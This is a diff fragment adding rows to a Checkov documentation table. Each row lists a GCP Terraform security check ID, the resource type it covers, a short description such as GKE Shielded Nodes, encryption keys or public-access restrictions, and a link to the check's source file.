+| 2486 | CKV_GCP_68               | resource                         | google_container_cluster                                                                         | Ensure Secure Boot for Shielded GKE Nodes is Enabled                                                                                                                                                     | Terraform               | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py)                                                                     |
+| 2487 | CKV_GCP_68               | resource                         | google_container_node_pool                                                                       | Ensure Secure Boot for Shielded GKE Nodes is Enabled                                                                                                                                                     | Terraform               | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py)                                                                     |
+| 2488 | CKV_GCP_69               | resource                         | google_container_cluster                                                                         | Ensure the GKE Metadata Server is Enabled                                                                                                                                                                | Terraform               | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py)                                                                           |
+| 2489 | CKV_GCP_69               | resource                         | google_container_node_pool                                                                       | Ensure the GKE Metadata Server is Enabled                                                                                                                                                                | Terraform               | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py)                                                                           |
+| 2490 | CKV_GCP_70               | resource                         | google_container_cluster                                                                         | Ensure the GKE Release Channel is set                                                                                                                                                                    | Terraform               | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py)                                                                                             |
+| 2491 | CKV_GCP_71               | resource                         | google_container_cluster                                                                         | Ensure Shielded GKE Nodes are Enabled                                                                                                                                                                    | Terraform               | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py)                                                                                   |
+| 2492 | CKV_GCP_72               | resource                         | google_container_cluster                                                                         | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled                                                                                                                                            | Terraform               | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py)                                                                       |
+| 2493 | CKV_GCP_72               | resource                         | google_container_node_pool                                                                       | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled                                                                                                                                            | Terraform               | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py)                                                                       |
+| 2494 | CKV_GCP_73               | resource                         | google_compute_security_policy                                                                   | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                  | Terraform               | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py)                                                                       |
+| 2495 | CKV_GCP_74               | resource                         | google_compute_subnetwork                                                                        | Ensure that private_ip_google_access is enabled for Subnet                                                                                                                                               | Terraform               | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py)                                                       |
+| 2496 | CKV_GCP_75               | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted FTP access                                                                                                                            | Terraform               | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py)                                           |
+| 2497 | CKV_GCP_76               | resource                         | google_compute_subnetwork                                                                        | Ensure that Private google access is enabled for IPV6                                                                                                                                                    | Terraform               | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py)                                               |
+| 2498 | CKV_GCP_77               | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow on ftp port                                                                                                                                        | Terraform               | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py)                                           |
+| 2499 | CKV_GCP_78               | resource                         | google_storage_bucket                                                                            | Ensure Cloud storage has versioning enabled                                                                                                                                                              | Terraform               | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py)                                                                     |
+| 2500 | CKV_GCP_79               | resource                         | google_sql_database_instance                                                                     | Ensure SQL database is using latest Major version                                                                                                                                                        | Terraform               | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py)                                                                                       |
+| 2501 | CKV_GCP_80               | resource                         | google_bigquery_table                                                                            | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                      | Terraform               | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py)                                                                     |
+| 2502 | CKV_GCP_81               | resource                         | google_bigquery_dataset                                                                          | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                    | Terraform               | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py)                                                                 |
+| 2503 | CKV_GCP_82               | resource                         | google_kms_crypto_key                                                                            | Ensure KMS keys are protected from deletion                                                                                                                                                              | Terraform               | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py)                                                                                 |
+| 2504 | CKV_GCP_83               | resource                         | google_pubsub_topic                                                                              | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                         | Terraform               | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py)                                                                         |
+| 2505 | CKV_GCP_84               | resource                         | google_artifact_registry_repository                                                              | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                        | Terraform               | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py)                                                               |
+| 2506 | CKV_GCP_85               | resource                         | google_bigtable_instance                                                                         | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                   | Terraform               | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py)                                                               |
+| 2507 | CKV_GCP_86               | resource                         | google_cloudbuild_worker_pool                                                                    | Ensure Cloud build workers are private                                                                                                                                                                   | Terraform               | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py)                                                                         |
+| 2508 | CKV_GCP_87               | resource                         | google_data_fusion_instance                                                                      | Ensure Data fusion instances are private                                                                                                                                                                 | Terraform               | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py)                                                                             |
+| 2509 | CKV_GCP_88               | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted mysql access                                                                                                                          | Terraform               | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py)                                       |
+| 2510 | CKV_GCP_89               | resource                         | google_notebooks_instance                                                                        | Ensure Vertex AI instances are private                                                                                                                                                                   | Terraform               | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py)                                                                                 |
+| 2511 | CKV_GCP_90               | resource                         | google_dataflow_job                                                                              | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                        | Terraform               | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py)                                                                         |
+| 2512 | CKV_GCP_91               | resource                         | google_dataproc_cluster                                                                          | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                       | Terraform               | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py)                                                                 |
+| 2513 | CKV_GCP_92               | resource                         | google_vertex_ai_dataset                                                                         | Ensure Vertex AI datasets uses a CMK (Customer Managed Key)                                                                                                                                              | Terraform               | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py)                                                                 |
+| 2514 | CKV_GCP_93               | resource                         | google_spanner_database                                                                          | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                       | Terraform               | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py)                                                                 |
+| 2515 | CKV_GCP_94               | resource                         | google_dataflow_job                                                                              | Ensure Dataflow jobs are private                                                                                                                                                                         | Terraform               | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py)                                                                                           |
+| 2516 | CKV_GCP_95               | resource                         | google_redis_instance                                                                            | Ensure Memorystore for Redis has AUTH enabled                                                                                                                                                            | Terraform               | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py)                                                                   |
+| 2517 | CKV_GCP_96               | resource                         | google_vertex_ai_metadata_store                                                                  | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key)                                                                                                                                        | Terraform               | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py)                                                     |
+| 2518 | CKV_GCP_97               | resource                         | google_redis_instance                                                                            | Ensure Memorystore for Redis uses intransit encryption                                                                                                                                                   | Terraform               | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py)                                                   |
+| 2519 | CKV_GCP_98               | resource                         | google_dataproc_cluster_iam_binding                                                              | Ensure that Dataproc clusters are not anonymously or publicly accessible                                                                                                                                 | Terraform               | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py)                                                                                   |
+| 2520 | CKV_GCP_98               | resource                         | google_dataproc_cluster_iam_member                                                               | Ensure that Dataproc clusters are not anonymously or publicly accessible                                                                                                                                 | Terraform               | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py)                                                                                   |
+| 2521 | CKV_GCP_99               | resource                         | google_pubsub_topic_iam_binding                                                                  | Ensure that Pub/Sub Topics are not anonymously or publicly accessible                                                                                                                                    | Terraform               | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py)                                                                                           |
+| 2522 | CKV_GCP_99               | resource                         | google_pubsub_topic_iam_member                                                                   | Ensure that Pub/Sub Topics are not anonymously or publicly accessible                                                                                                                                    | Terraform               | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py)                                                                                           |
+| 2523 | CKV_GCP_100              | resource                         | google_bigquery_table_iam_binding                                                                | Ensure that BigQuery Tables are not anonymously or publicly accessible                                                                                                                                   | Terraform               | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py)                                                                                       |
+| 2524 | CKV_GCP_100              | resource                         | google_bigquery_table_iam_member                                                                 | Ensure that BigQuery Tables are not anonymously or publicly accessible                                                                                                                                   | Terraform               | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py)                                                                                       |
+| 2525 | CKV_GCP_101              | resource                         | google_artifact_registry_repository_iam_binding                                                  | Ensure that Artifact Registry repositories are not anonymously or publicly accessible                                                                                                                    | Terraform               | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py)                                                                         |
+| 2526 | CKV_GCP_101              | resource                         | google_artifact_registry_repository_iam_member                                                   | Ensure that Artifact Registry repositories are not anonymously or publicly accessible                                                                                                                    | Terraform               | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py)                                                                         |
+| 2527 | CKV_GCP_102              | resource                         | google_cloud_run_service_iam_binding                                                             | Ensure that GCP Cloud Run services are not anonymously or publicly accessible                                                                                                                            | Terraform               | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py)                                                                             |
+| 2528 | CKV_GCP_102              | resource                         | google_cloud_run_service_iam_member                                                              | Ensure that GCP Cloud Run services are not anonymously or publicly accessible                                                                                                                            | Terraform               | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py)                                                                             |
+| 2529 | CKV_GCP_103              | resource                         | google_dataproc_cluster                                                                          | Ensure Dataproc Clusters do not have public IPs                                                                                                                                                          | Terraform               | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py)                                                                                 |
+| 2530 | CKV_GCP_104              | resource                         | google_data_fusion_instance                                                                      | Ensure Datafusion has stack driver logging enabled                                                                                                                                                       | Terraform               | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py)                                                                             |
+| 2531 | CKV_GCP_105              | resource                         | google_data_fusion_instance                                                                      | Ensure Datafusion has stack driver monitoring enabled                                                                                                                                                    | Terraform               | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py)                                                                 |
+| 2532 | CKV_GCP_106              | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access                                                                                                                   | Terraform               | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py)                                           |
+| 2533 | CKV_GCP_107              | resource                         | google_cloudfunctions2_function_iam_binding                                                      | Cloud functions should not be public                                                                                                                                                                     | Terraform               | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                                 |
+| 2534 | CKV_GCP_107              | resource                         | google_cloudfunctions2_function_iam_member                                                       | Cloud functions should not be public                                                                                                                                                                     | Terraform               | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                                 |
+| 2535 | CKV_GCP_107              | resource                         | google_cloudfunctions_function_iam_binding                                                       | Cloud functions should not be public                                                                                                                                                                     | Terraform               | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                                 |
+| 2536 | CKV_GCP_107              | resource                         | google_cloudfunctions_function_iam_member                                                        | Cloud functions should not be public                                                                                                                                                                     | Terraform               | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                                 |
+| 2537 | CKV_GCP_108              | resource                         | google_sql_database_instance                                                                     | Ensure hostnames are logged for GCP PostgreSQL databases                                                                                                                                                 | Terraform               | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py)                                                               |
+| 2538 | CKV_GCP_109              | resource                         | google_sql_database_instance                                                                     | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower                                                                                                                                  | Terraform               | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py)                                             |
+| 2539 | CKV_GCP_110              | resource                         | google_sql_database_instance                                                                     | Ensure pgAudit is enabled for your GCP PostgreSQL database                                                                                                                                               | Terraform               | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py)                                                           |
+| 2540 | CKV_GCP_111              | resource                         | google_sql_database_instance                                                                     | Ensure GCP PostgreSQL logs SQL statements                                                                                                                                                                | Terraform               | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py)                                                             |
+| 2541 | CKV_GCP_112              | resource                         | google_kms_crypto_key_iam_binding                                                                | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform               | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                                       |
+| 2542 | CKV_GCP_112              | resource                         | google_kms_crypto_key_iam_member                                                                 | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform               | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                                       |
+| 2543 | CKV_GCP_112              | resource                         | google_kms_crypto_key_iam_policy                                                                 | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform               | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                                       |
+| 2544 | CKV_GCP_113              | data                             | google_iam_policy                                                                                | Ensure IAM policy should not define public access                                                                                                                                                        | Terraform               | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py)                                                                                         |
+| 2545 | CKV_GCP_114              | resource                         | google_storage_bucket                                                                            | Ensure public access prevention is enforced on Cloud Storage bucket                                                                                                                                      | Terraform               | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py)                                                         |
+| 2546 | CKV_GCP_115              | resource                         | google_organization_iam_binding                                                                  | Ensure basic roles are not used at organization level.                                                                                                                                                   | Terraform               | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py)                                                                                           |
+| 2547 | CKV_GCP_115              | resource                         | google_organization_iam_member                                                                   | Ensure basic roles are not used at organization level.                                                                                                                                                   | Terraform               | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py)                                                                                           |
+| 2548 | CKV_GCP_116              | resource                         | google_folder_iam_binding                                                                        | Ensure basic roles are not used at folder level.                                                                                                                                                         | Terraform               | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py)                                                                                     |
+| 2549 | CKV_GCP_116              | resource                         | google_folder_iam_member                                                                         | Ensure basic roles are not used at folder level.                                                                                                                                                         | Terraform               | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py)                                                                                     |
+| 2550 | CKV_GCP_117              | resource                         | google_project_iam_binding                                                                       | Ensure basic roles are not used at project level.                                                                                                                                                        | Terraform               | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py)                                                                                   |
+| 2551 | CKV_GCP_117              | resource                         | google_project_iam_member                                                                        | Ensure basic roles are not used at project level.                                                                                                                                                        | Terraform               | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py)                                                                                   |
+| 2552 | CKV_GCP_118              | resource                         | google_iam_workload_identity_pool_provider                                                       | Ensure IAM workload identity pool provider is restricted                                                                                                                                                 | Terraform               | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py)                                                       |
+| 2553 | CKV_GCP_119              | resource                         | google_spanner_database                                                                          | Ensure Spanner Database has deletion protection enabled                                                                                                                                                  | Terraform               | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py)                                                             |
+| 2554 | CKV_GCP_120              | resource                         | google_spanner_database                                                                          | Ensure Spanner Database has drop protection enabled                                                                                                                                                      | Terraform               | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py)                                                                     |
+| 2555 | CKV_GCP_121              | resource                         | google_bigquery_table                                                                            | Ensure BigQuery tables have deletion protection enabled                                                                                                                                                  | Terraform               | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py)                                                                 |
+| 2556 | CKV_GCP_122              | resource                         | google_bigtable_instance                                                                         | Ensure Big Table Instances have deletion protection enabled                                                                                                                                              | Terraform               | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py)                                                           |
+| 2557 | CKV_GCP_123              | resource                         | google_container_cluster                                                                         | GKE Don't Use NodePools in the Cluster configuration                                                                                                                                                     | Terraform               | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py)                                                                                         |
+| 2558 | CKV_GCP_124              | resource                         | google_cloudfunctions2_function                                                                  | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting                                                                                                                       | Terraform               | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py)                                                                   |
+| 2559 | CKV_GCP_124              | resource                         | google_cloudfunctions_function                                                                   | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting                                                                                                                       | Terraform               | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py)                                                                   |
+| 2560 | CKV2_GCP_1               | resource                         | google_project_default_service_accounts                                                          | Ensure GKE clusters are not running using the Compute Engine default service account                                                                                                                     | Terraform               | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml)                                 |
+| 2561 | CKV2_GCP_2               | resource                         | google_compute_network                                                                           | Ensure legacy networks do not exist for a project                                                                                                                                                        | Terraform               | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml)                                                             |
+| 2562 | CKV2_GCP_3               | resource                         | google_service_account_key                                                                       | Ensure that there are only GCP-managed service account keys for each service account                                                                                                                     | Terraform               | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml)                                                           |
+| 2563 | CKV2_GCP_4               | resource                         | google_logging_folder_sink                                                                       | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform               | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                                       |
+| 2564 | CKV2_GCP_4               | resource                         | google_logging_organization_sink                                                                 | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform               | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                                       |
+| 2565 | CKV2_GCP_4               | resource                         | google_logging_project_sink                                                                      | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform               | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                                       |
+| 2566 | CKV2_GCP_4               | resource                         | google_storage_bucket                                                                            | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform               | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                                       |
+| 2567 | CKV2_GCP_5               | resource                         | google_project                                                                                   | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project                                                                                                  | Terraform               | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml)                               |
+| 2568 | CKV2_GCP_5               | resource                         | google_project_iam_audit_config                                                                  | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project                                                                                                  | Terraform               | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml)                               |
+| 2569 | CKV2_GCP_6               | resource                         | google_kms_crypto_key                                                                            | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform               | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                                       |
+| 2570 | CKV2_GCP_6               | resource                         | google_kms_crypto_key_iam_binding                                                                | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform               | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                                       |
+| 2571 | CKV2_GCP_6               | resource                         | google_kms_crypto_key_iam_member                                                                 | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform               | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                                       |
+| 2572 | CKV2_GCP_7               | resource                         | google_sql_database_instance                                                                     | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges                                                                                                    | Terraform               | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml)         |
+| 2573 | CKV2_GCP_7               | resource                         | google_sql_user                                                                                  | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges                                                                                                    | Terraform               | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml)         |
